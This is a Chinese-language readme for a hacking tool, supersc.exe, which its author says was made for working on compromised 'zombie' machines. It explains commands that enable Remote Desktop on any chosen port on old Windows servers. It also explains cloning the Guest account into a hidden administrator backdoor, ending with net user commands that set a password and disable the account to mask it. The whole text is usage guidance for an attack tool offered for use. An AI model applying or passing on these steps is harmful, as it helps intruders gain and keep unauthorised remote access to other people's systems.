

**************************************************************************************** 
软件介绍:万能开3389+克隆Guest集合工具

作者：依冰

　　由于发现现在万能开3389的东西比较少，不是被查杀，就是假的不管用，
所以写了一个方便日后所用。后来想了想，不如再加上个Win2K克隆Guest用
户，这样在找肉鸡时有方便了点，于是这个小程序就诞生了。

使用：

E:\>supersc.exe /?

万能开3389+克隆Guest集合工具
作者:依冰[C.N.T]
主页:http://www.20nt.net
Email:yibing751@163.com

本程序可以打开、更改Win2K、WinXP、Win2K3系统终端
使用:supersc.exe [-s 3389] [-r]
[-s]可以任意填写端口  [-r]重启计算机

克隆Win2K Guest用户
使用:supersc.exe [-c] [-r]
[-c]参数表示克隆Guest  [-r]重启计算机

E:\>

解释：
E:\>supersc.exe -r
重新启动系统。

E:\>supersc.exe -s
打开或修改终端服务，端口为3389。注：如果终端服务已开，端口改为3389！

E:\>supersc.exe -s 1985
打开或修改终端服务，端口为1985。注：如果终端服务已开，端口改为1985！

E:\>supersc.exe -s -r
打开或修改终端服务，端口为3389，并重新启动系统。

E:\>supersc.exe -s 1985 -r
打开或修改终端服务，端口为1985，并重新启动系统。

E:\>supersc.exe -c
克隆Guest用户。注：只针对Win2000！

E:\>supersc.exe -c -r
克隆Guest用户并重新启动系统。

注：执行完毕克隆Guest用户命令后，请自行使用cmd命令更改Guest用户密码并
禁用Guest用户！

例：
E:\>supersc.exe -c
克隆完成!

E:\>net user guest 123456789
命令成功完成。

E:\>net user guest /active:no
命令成功完成。
